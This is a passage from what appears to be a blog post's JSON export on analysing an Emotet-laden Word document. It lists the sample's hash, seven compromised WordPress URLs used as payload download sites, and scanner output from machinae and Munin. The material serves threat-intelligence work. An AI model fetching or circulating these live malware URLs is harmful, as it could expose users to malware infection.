href=\"http:\/\/urlhaus.abuse.ch\/browse.php?search=http%3A%2F%2F401kplansinfo.com%2Fcgi-bin%2FKtFRk%2F+\" rel=\"noopener noreferrer\" target=\"_blank\">http:\/\/urlhaus.abuse.ch\/browse.php?search=http%3A%2F%2F401kplansinfo.com%2Fcgi-bin%2FKtFRk%2F+<\/a><br \/>\n<a href=\"http:\/\/urlhaus.abuse.ch\/browse.php?search=http%3A%2F%2Ffidelityguide.com%2Fcgi-bin%2FVA%2F\" rel=\"noopener noreferrer\" target=\"_blank\">http:\/\/urlhaus.abuse.ch\/browse.php?search=http%3A%2F%2Ffidelityguide.com%2Fcgi-bin%2FVA%2F<\/a><br \/>\n<a 
href=\"http:\/\/urlhaus.abuse.ch\/browse.php?search=https%3A%2F%2Fsirnakmidyeci.com%2Fwp-includes%2Fqk9wW2%2F+\" rel=\"noopener noreferrer\" target=\"_blank\">http:\/\/urlhaus.abuse.ch\/browse.php?search=https%3A%2F%2Fsirnakmidyeci.com%2Fwp-includes%2Fqk9wW2%2F+<\/a><br \/>\n<a href=\"http:\/\/urlhaus.abuse.ch\/browse.php?search=https%3A%2F%2Fsubitocarne.com%2Fwp-content%2FByeOAt9%2F\" rel=\"noopener noreferrer\" target=\"_blank\">http:\/\/urlhaus.abuse.ch\/browse.php?search=https%3A%2F%2Fsubitocarne.com%2Fwp-content%2FByeOAt9%2F<\/a><br \/>\n<a href=\"http:\/\/urlhaus.abuse.ch\/browse.php?search=https%3A%2F%2Feliesalibaarchitect.com%2Fwordpress%2FT%2F\" rel=\"noopener noreferrer\" target=\"_blank\">http:\/\/urlhaus.abuse.ch\/browse.php?search=https%3A%2F%2Feliesalibaarchitect.com%2Fwordpress%2FT%2F<\/a><\/p>\n<p>File hashes<br \/>\n&#8212;&#8212;&#8212;&#8212;&#8211;<br \/>\n515ade7cffd3da164621375f63150e57f2f8c9f06bad8289c8adde9d3803daa0 &#8212; LRE-090120 JYW-092120.doc<\/p>\n<p>Machinae<br \/>\n&#8212;&#8212;&#8212;-<br \/>\nmachinae 515ade7cffd3da164621375f63150e57f2f8c9f06bad8289c8adde9d3803daa0 http:\/\/haymetetrading.com\/wp-includes\/yGELKj4\/ http:\/\/simofferbd24.com\/wp-includes\/fsiQc\/ http:\/\/401kplansinfo.com\/cgi-bin\/KtFRk\/ http:\/\/fidelityguide.com\/cgi-bin\/VA\/ http:\/\/sirnakmidyeci.com\/wp-includes\/qk9wW2\/ http:\/\/subitocarne.com\/wp-content\/ByeOAt9\/ http:\/\/eliesalibaarchitect.com\/wordpress\/T\/<\/p>\n<p>********************************************************************************<br \/>\n* Information for 515ade7cffd3da164621375f63150e57f2f8c9f06bad8289c8adde9d3803daa0<br \/>\n* Observable type: hash.sha256 (Auto-detected: True)<br \/>\n********************************************************************************<br \/>\nNot seeing what you expect? Likely not a valid site. 
Try running with &#8211;list-sites<br \/>\n[+] VirusTotal File Report Results<br \/>\n    [-] Date submitted: 2020-09-22 16:56:49<br \/>\n    [-] Detected engines: 35<br \/>\n    [-] Total engines: 59<br \/>\n    [-] Scans: (&#8216;Elastic&#8217;, &#8216;malicious (high confidence)&#8217;)<br \/>\n    [-] Scans: (&#8216;ClamAV&#8217;, &#8216;Doc[.]Downloader[.]Generic-9764611-0&#8217;)<br \/>\n    [-] Scans: (&#8216;CAT-QuickHeal&#8217;, &#8216;OLE[.]Emotet.39167&#8217;)<br \/>\n    [-] Scans: (&#8216;McAfee&#8217;, &#8216;W97M\/Downloader[.]dbv&#8217;)<br \/>\n    [-] Scans: (&#8216;K7AntiVirus&#8217;, &#8216;Trojan ( 0056edf51 )&#8217;)<br \/>\n    [-] Scans: (&#8216;K7GW&#8217;, &#8216;Trojan ( 0056edf51 )&#8217;)<br \/>\n    [-] Scans: (&#8216;TrendMicro&#8217;, &#8216;Trojan.W97M[.]EMOTET[.]TIOIBELH&#8217;)<br \/>\n    [-] Scans: (&#8216;Cyren&#8217;, &#8216;W97M\/Agent.A&#8217;)<br \/>\n    [-] Scans: (&#8216;Symantec&#8217;, &#8216;W97M[.]Downloader&#8217;)<br \/>\n    [-] Scans: (&#8216;ESET-NOD32&#8217;, &#8216;VBA\/TrojanDownloader[.]Agent[.]UFY&#8217;)<br \/>\n    [-] Scans: (&#8216;TrendMicro-HouseCall&#8217;, &#8216;Trojan.W97M[.]EMOTET[.]TIOIBELH&#8217;)<br \/>\n    [-] Scans: (&#8216;Kaspersky&#8217;, &#8216;HEUR:Trojan.MSOffice[.]SAgent[.]gen&#8217;)<br \/>\n    [-] Scans: (&#8216;BitDefender&#8217;, &#8216;VB:Trojan.VBA[.]Agent[.]BHR&#8217;)<br \/>\n    [-] Scans: (&#8216;MicroWorld-eScan&#8217;, &#8216;VB:Trojan.VBA[.]Agent[.]BHR&#8217;)<br \/>\n    [-] Scans: (&#8216;Tencent&#8217;, &#8216;Heur[.]Macro[.]Generic.h.9fc6359d&#8217;)<br \/>\n    [-] Scans: (&#8216;Ad-Aware&#8217;, &#8216;VB:Trojan.VBA[.]Agent[.]BHR&#8217;)<br \/>\n    [-] Scans: (&#8216;Sophos&#8217;, &#8216;Mal\/DocDl-K&#8217;)<br \/>\n    [-] Scans: (&#8216;F-Secure&#8217;, &#8216;Malware[.]VBA\/Dldr.Agent[.]boxrg&#8217;)<br \/>\n    [-] Scans: (&#8216;Invincea&#8217;, &#8216;Mal\/DocDl-K&#8217;)<br \/>\n    [-] Scans: (&#8216;McAfee-GW-Edition&#8217;, 
&#8216;W97M\/Downloader[.]dbv&#8217;)<br \/>\n    [-] Scans: (&#8216;FireEye&#8217;, &#8216;VB:Trojan.VBA[.]Agent[.]BHR&#8217;)<br \/>\n    [-] Scans: (&#8216;Emsisoft&#8217;, &#8216;VB:Trojan.VBA[.]Agent[.]BHR (B)&#8217;)<br \/>\n    [-] Scans: (&#8216;Avira&#8217;, &#8216;VBA\/Dldr[.]Agent[.]boxrg&#8217;)<br \/>\n    [-] Scans: (&#8216;Microsoft&#8217;, &#8216;TrojanDownloader:O97M\/Emotet[.]PEE!MTB&#8217;)<br \/>\n    [-] Scans: (&#8216;Arcabit&#8217;, &#8216;VB:Trojan.VBA[.]Agent[.]BHR&#8217;)<br \/>\n    [-] Scans: (&#8216;AegisLab&#8217;, &#8216;Trojan[.]MSWord[.]Generic.4!c&#8217;)<br \/>\n    [-] Scans: (&#8216;ZoneAlarm&#8217;, &#8216;HEUR:Trojan.MSOffice[.]SAgent[.]gen&#8217;)<br \/>\n    [-] Scans: (&#8216;GData&#8217;, &#8216;VB:Trojan.VBA[.]Agent[.]BHR&#8217;)<br \/>\n    [-] Scans: (&#8216;AhnLab-V3&#8217;, &#8216;Downloader\/MSOffice[.]Generic&#8217;)<br \/>\n    [-] Scans: (&#8216;TACHYON&#8217;, &#8216;Suspicious\/W97M[.]Obfus[.]Gen.5&#8217;)<br \/>\n    [-] Scans: (&#8216;Zoner&#8217;, &#8216;Probably Heur.W97Obfuscated&#8217;)<br \/>\n    [-] Scans: (&#8216;Rising&#8217;, &#8216;Malware[.]ObfusVBA@ML.89 (VBA)&#8217;)<br \/>\n    [-] Scans: (&#8216;Ikarus&#8217;, &#8216;Trojan-Downloader[.]VBA[.]Emotet&#8217;)<br \/>\n    [-] Scans: (&#8216;Fortinet&#8217;, &#8216;VBA\/Agent[.]DBV!tr[.]dldr&#8217;)<br \/>\n    [-] Scans: (&#8216;Qihoo-360&#8217;, &#8216;virus[.]office[.]qexvmc.1095&#8217;)<\/p>\n<p>********************************************************************************<br \/>\n* Information for http:\/\/haymetetrading.com\/wp-includes\/yGELKj4\/<br \/>\n* Observable type: url (Auto-detected: True)<br \/>\n********************************************************************************<br \/>\nNot seeing what you expect? Likely not a valid site. 
Try running with &#8211;list-sites<br \/>\n[-] No URL Unshorten Results<br \/>\n[+] Fortinet Category Results<br \/>\n    [-] Fortinet URL Category: Malicious Websites<br \/>\n[+] VirusTotal URL Report Results<br \/>\n    [-] Date submitted: 2020-09-22 16:00:16<br \/>\n    [-] Detected scanners: 13<br \/>\n    [-] Total scanners: 79<br \/>\n    [-] URL Scanner: (&#8216;Kaspersky&#8217;, &#8216;malware site&#8217;)<br \/>\n    [-] URL Scanner: (&#8216;G-Data&#8217;, &#8216;malware site&#8217;)<br \/>\n    [-] URL Scanner: (&#8216;CyRadar&#8217;, &#8216;malicious site&#8217;)<br \/>\n    [-] URL Scanner: (&#8216;Dr[.]Web&#8217;, &#8216;malicious site&#8217;)<br \/>\n    [-] URL Scanner: (&#8216;Spamhaus&#8217;, &#8216;malware site&#8217;)<br \/>\n    [-] URL Scanner: (&#8216;Avira&#8217;, &#8216;malware site&#8217;)<br \/>\n    [-] URL Scanner: (&#8216;SCUMWARE[.]org&#8217;, &#8216;malware site&#8217;)<br \/>\n    [-] URL Scanner: (&#8216;URLhaus&#8217;, &#8216;malicious site&#8217;)<br \/>\n    [-] URL Scanner: (&#8216;ESET&#8217;, &#8216;malware site&#8217;)<br \/>\n    [-] URL Scanner: (&#8216;Sophos&#8217;, &#8216;malware site&#8217;)<br \/>\n    [-] URL Scanner: (&#8216;Netcraft&#8217;, &#8216;malicious site&#8217;)<br \/>\n    [-] URL Scanner: (&#8216;CRDF&#8217;, &#8216;malicious site&#8217;)<br \/>\n    [-] URL Scanner: (&#8216;Fortinet&#8217;, &#8216;malware site&#8217;)<\/p>\n<p>********************************************************************************<br \/>\n* Information for http:\/\/simofferbd24.com\/wp-includes\/fsiQc\/<br \/>\n* Observable type: url (Auto-detected: True)<br \/>\n********************************************************************************<br \/>\nNot seeing what you expect? Likely not a valid site. 
Try running with &#8211;list-sites<br \/>\n[-] No URL Unshorten Results<br \/>\n[+] Fortinet Category Results<br \/>\n    [-] Fortinet URL Category: Malicious Websites<br \/>\n[+] VirusTotal URL Report Results<br \/>\n    [-] Date submitted: 2020-09-22 02:19:27<br \/>\n    [-] Detected scanners: 12<br \/>\n    [-] Total scanners: 79<br \/>\n    [-] URL Scanner: (&#8216;Kaspersky&#8217;, &#8216;malware site&#8217;)<br \/>\n    [-] URL Scanner: (&#8216;CyRadar&#8217;, &#8216;malicious site&#8217;)<br \/>\n    [-] URL Scanner: (&#8216;AlienVault&#8217;, &#8216;malicious site&#8217;)<br \/>\n    [-] URL Scanner: (&#8216;Spamhaus&#8217;, &#8216;malware site&#8217;)<br \/>\n    [-] URL Scanner: (&#8216;Avira&#8217;, &#8216;malware site&#8217;)<br \/>\n    [-] URL Scanner: (&#8216;SCUMWARE[.]org&#8217;, &#8216;malware site&#8217;)<br \/>\n    [-] URL Scanner: (&#8216;URLhaus&#8217;, &#8216;malicious site&#8217;)<br \/>\n    [-] URL Scanner: (&#8216;ESET&#8217;, &#8216;malware site&#8217;)<br \/>\n    [-] URL Scanner: (&#8216;Sophos&#8217;, &#8216;malware site&#8217;)<br \/>\n    [-] URL Scanner: (&#8216;Netcraft&#8217;, &#8216;malicious site&#8217;)<br \/>\n    [-] URL Scanner: (&#8216;CRDF&#8217;, &#8216;malicious site&#8217;)<br \/>\n    [-] URL Scanner: (&#8216;Fortinet&#8217;, &#8216;malware site&#8217;)<\/p>\n<p>********************************************************************************<br \/>\n* Information for http:\/\/401kplansinfo.com\/cgi-bin\/KtFRk\/<br \/>\n* Observable type: url (Auto-detected: True)<br \/>\n********************************************************************************<br \/>\nNot seeing what you expect? Likely not a valid site. 
Try running with &#8211;list-sites<br \/>\n[-] No URL Unshorten Results<br \/>\n[+] Fortinet Category Results<br \/>\n    [-] Fortinet URL Category: Malicious Websites<br \/>\n[+] VirusTotal URL Report Results<br \/>\n    [-] Date submitted: 2020-09-21 16:42:18<br \/>\n    [-] Detected scanners: 3<br \/>\n    [-] Total scanners: 79<br \/>\n    [-] URL Scanner: (&#8216;G-Data&#8217;, &#8216;malware site&#8217;)<br \/>\n    [-] URL Scanner: (&#8216;Spamhaus&#8217;, &#8216;malware site&#8217;)<br \/>\n    [-] URL Scanner: (&#8216;Fortinet&#8217;, &#8216;malware site&#8217;)<\/p>\n<p>********************************************************************************<br \/>\n* Information for http:\/\/fidelityguide.com\/cgi-bin\/VA\/<br \/>\n* Observable type: url (Auto-detected: True)<br \/>\n********************************************************************************<br \/>\nNot seeing what you expect? Likely not a valid site. Try running with &#8211;list-sites<br \/>\n[-] No URL Unshorten Results<br \/>\n[+] Fortinet Category Results<br \/>\n    [-] Fortinet URL Category: Malicious Websites<\/p>\n<p>********************************************************************************<br \/>\n* Information for http:\/\/sirnakmidyeci.com\/wp-includes\/qk9wW2\/<br \/>\n* Observable type: url (Auto-detected: True)<br \/>\n********************************************************************************<br \/>\nNot seeing what you expect? Likely not a valid site. Try running with &#8211;list-sites<br \/>\n[-] No URL Unshorten Results<br \/>\n[+] Fortinet Category Results<br \/>\n    [-] Fortinet URL Category: Malicious Websites<\/p>\n<p>********************************************************************************<br \/>\n* Information for http:\/\/subitocarne.com\/wp-content\/ByeOAt9\/<br \/>\n* Observable type: url (Auto-detected: True)<br \/>\n********************************************************************************<br \/>\nNot seeing what you expect? 
Likely not a valid site. Try running with &#8211;list-sites<br \/>\n[-] No URL Unshorten Results<br \/>\n[+] Fortinet Category Results<br \/>\n    [-] Fortinet URL Category: Malicious Websites<br \/>\n[+] VirusTotal URL Report Results<br \/>\n    [-] Date submitted: 2020-09-21 18:24:28<br \/>\n    [-] Detected scanners: 8<br \/>\n    [-] Total scanners: 79<br \/>\n    [-] URL Scanner: (&#8216;Kaspersky&#8217;, &#8216;malware site&#8217;)<br \/>\n    [-] URL Scanner: (&#8216;Spamhaus&#8217;, &#8216;malware site&#8217;)<br \/>\n    [-] URL Scanner: (&#8216;Avira&#8217;, &#8216;malware site&#8217;)<br \/>\n    [-] URL Scanner: (&#8216;SCUMWARE[.]org&#8217;, &#8216;malware site&#8217;)<br \/>\n    [-] URL Scanner: (&#8216;URLhaus&#8217;, &#8216;malicious site&#8217;)<br \/>\n    [-] URL Scanner: (&#8216;ESET&#8217;, &#8216;malware site&#8217;)<br \/>\n    [-] URL Scanner: (&#8216;Netcraft&#8217;, &#8216;malicious site&#8217;)<br \/>\n    [-] URL Scanner: (&#8216;Fortinet&#8217;, &#8216;malware site&#8217;)<\/p>\n<p>********************************************************************************<br \/>\n* Information for http:\/\/eliesalibaarchitect.com\/wordpress\/T\/<br \/>\n* Observable type: url (Auto-detected: True)<br \/>\n********************************************************************************<br \/>\nNot seeing what you expect? Likely not a valid site. 
Try running with &#8211;list-sites<br \/>\n[-] No URL Unshorten Results<br \/>\n[+] Fortinet Category Results<br \/>\n    [-] Fortinet URL Category: Malicious Websites<br \/>\n[+] VirusTotal URL Report Results<br \/>\n    [-] Date submitted: 2020-09-22 05:04:16<br \/>\n    [-] Detected scanners: 12<br \/>\n    [-] Total scanners: 79<br \/>\n    [-] URL Scanner: (&#8216;Kaspersky&#8217;, &#8216;malware site&#8217;)<br \/>\n    [-] URL Scanner: (&#8216;CyRadar&#8217;, &#8216;malicious site&#8217;)<br \/>\n    [-] URL Scanner: (&#8216;AlienVault&#8217;, &#8216;malicious site&#8217;)<br \/>\n    [-] URL Scanner: (&#8216;Spamhaus&#8217;, &#8216;malware site&#8217;)<br \/>\n    [-] URL Scanner: (&#8216;Avira&#8217;, &#8216;malware site&#8217;)<br \/>\n    [-] URL Scanner: (&#8216;SCUMWARE[.]org&#8217;, &#8216;malware site&#8217;)<br \/>\n    [-] URL Scanner: (&#8216;URLhaus&#8217;, &#8216;malicious site&#8217;)<br \/>\n    [-] URL Scanner: (&#8216;ESET&#8217;, &#8216;malware site&#8217;)<br \/>\n    [-] URL Scanner: (&#8216;Sophos&#8217;, &#8216;malware site&#8217;)<br \/>\n    [-] URL Scanner: (&#8216;Netcraft&#8217;, &#8216;malicious site&#8217;)<br \/>\n    [-] URL Scanner: (&#8216;CRDF&#8217;, &#8216;malicious site&#8217;)<br \/>\n    [-] URL Scanner: (&#8216;Fortinet&#8217;, &#8216;malware site&#8217;)<\/p>\n<p>Munin<br \/>\n&#8212;&#8212;-<br \/>\nOnline Hash Checker for Virustotal and Other Services<br \/>\nFlorian Roth &#8211; 0.18.1 July 2019                                               <\/p>\n<p> 1 \/ 1 &gt; Malicious<br \/>\nHASH: 515ade7cffd3da164621375f63150e57f2f8c9f06bad8289c8adde9d3803daa0 COMMENT: LRE-090120 JYW-092120.doc<br \/>\nVIRUS: Microsoft: TrojanDownloader:O97M\/Emotet.PEE!MTB \/ Kaspersky: HEUR:Trojan.MSOffice.SAgent.gen \/ McAfee: W97M\/Downloader.dbv \/ TrendMicro: Trojan.W97M.EMOTET.TIOIBELH \/ ESET-NOD32: VBA\/TrojanDownloader.Agent.UFY \/ Symantec: W97M.Downloader \/ F-Secure: Malware.VBA\/Dldr.Agent.boxrg \/ Sophos: Mal\/DocDl-K \/ 
GData: VB:Trojan.VBA.Agent.BHR<br \/>\nTYPE: MS Word Document SIZE: 199.12 KB FILENAMES: Price &#8211; Sep 21, 2020.doc, Price &#8211; Sep 21, 2020.doc<br \/>\nFIRST: 2020-09-21 20:04:15 LAST: 2020-09-22 16:56:49 SUBMISSIONS: 1 REPUTATION: 0<br \/>\nCOMMENTS: 3 USERS: thor, inquest.labs, thor TAGS: OBFUSCATED EXE-PATTERN DOC MACROS ATTACHMENT EXECUTES-DROPPED-FILE HIDE-APP CREATE-OLE<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Summary ========= In this post I am going to cover how I managed to deobfuscate the macro for this Emotet (Epoch 2) sample. The maldoc can be found here. Analysis ========== With this, I started off with the tried and true OleTools suite to see if I could get anything from this sample. Unfortunately I got a lot of Python errors when trying to run this. I then tried to run it through OfficeMalscanner and got nothing back as well. Looking at the Word doc via &#8220;file&#8221; I could see that there was a macro in the file and&#8230;<\/p>\n<p> <a class=\"continue-reading-link\" href=\"https:\/\/www.herbiez.com\/?p=1411\"><span>Continue reading<\/span><i class=\"crycon-right-dir\"><\/i><\/a> 
<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[10],"tags":[33,12],"class_list":["post-1411","post","type-post","status-publish","format-standard","hentry","category-code","tag-deobfuscating-code","tag-emotet"],"_links":{"self":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/1411","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1411"}],"version-history":[{"count":2,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/1411\/revisions"}],"predecessor-version":[{"id":1417,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/1411\/revisions\/1417"}],"wp:attachment":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1411"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1411"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1411"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}